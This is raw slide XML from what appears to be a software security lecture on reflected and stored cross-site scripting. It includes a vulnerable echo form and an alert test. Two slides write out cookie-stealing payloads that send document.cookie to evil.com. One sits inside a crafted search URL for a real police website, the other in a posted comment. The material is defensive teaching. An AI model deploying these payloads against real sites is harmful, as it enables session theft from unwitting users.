          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3579906"/>
            <a:ext cx="7315200" cy="2211294"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="6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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS" action="#" method="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p&gt;What's your name?&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="name"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;alert(“hi”)&lt;/script&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Screen Shot 2012-07-02 at 4.08.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600" y="1524000"/>
            <a:ext cx="3251200" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lacing JavaScript</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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="2540000"/>
            <a:ext cx="2362200" cy="103990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33600" y="5448300"/>
            <a:ext cx="3810000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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5" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455024" y="5905500"/>
            <a:ext cx="3200400" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545"/>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Injected code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1778000"/>
            <a:ext cx="4648200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332"/>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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“hi”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334381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“Reflected” XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server reflects back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-laced input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send victims a link containing XSS attack</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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9677400" y="3429000"/>
            <a:ext cx="3121367" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not clear to students</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how a real attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>would work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3485672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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2561825" y="323335"/>
            <a:ext cx="3733800" cy="1555909"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15543"/>
              <a:gd name="adj2" fmla="val 17569"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 64977"/>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200" dirty="0"/>
              <a:t>http://www.lapdonline.org/search_results/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=‘evil.com/’ +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%3C/script%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4538888"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258614" y="1525390"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490346" y="845704"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="951388"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5175973" y="1525389"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468414" y="2053490"/>
            <a:ext cx="1524000" cy="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135414" y="2786587"/>
            <a:ext cx="0" cy="160020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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591261" y="4538888"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5754414" y="2862787"/>
            <a:ext cx="0" cy="1524000"/>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087414" y="2862787"/>
            <a:ext cx="2088559" cy="1676101"/>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097150" y="2085832"/>
            <a:ext cx="2247731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Check out this link!”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081345" y="5021440"/>
            <a:ext cx="1611339" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lapdonline.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831339" y="5086183"/>
            <a:ext cx="1001556" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228143" y="5270849"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081345" y="5468653"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479628" y="2524858"/>
            <a:ext cx="2452053" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallou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200" dirty="0"/>
              <a:t>http://www.lapdonline.org/search_results/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%3C/script%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4148586" y="3971288"/>
            <a:ext cx="1408386" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58272"/>
              <a:gd name="adj2" fmla="val -100278"/>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dirty="0" smtClean="0"/>
              <a:t>Response containing malicious JS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148729" y="3557060"/>
            <a:ext cx="2720488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314165" y="3025741"/>
            <a:ext cx="3378922" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28625"/>
              <a:gd name="adj2" fmla="val 8307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Session token for lapdonline.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386960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P spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0"/>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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-laced input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload attack, users who view it are exploited</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167001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Software Security</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968590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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58445" y="3842476"/>
            <a:ext cx="3614860" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28369"/>
              <a:gd name="adj2" fmla="val 33421"/>
              <a:gd name="adj3" fmla="val 46895"/>
              <a:gd name="adj4" fmla="val 82755"/>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200" dirty="0" smtClean="0"/>
              <a:t>Posts comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
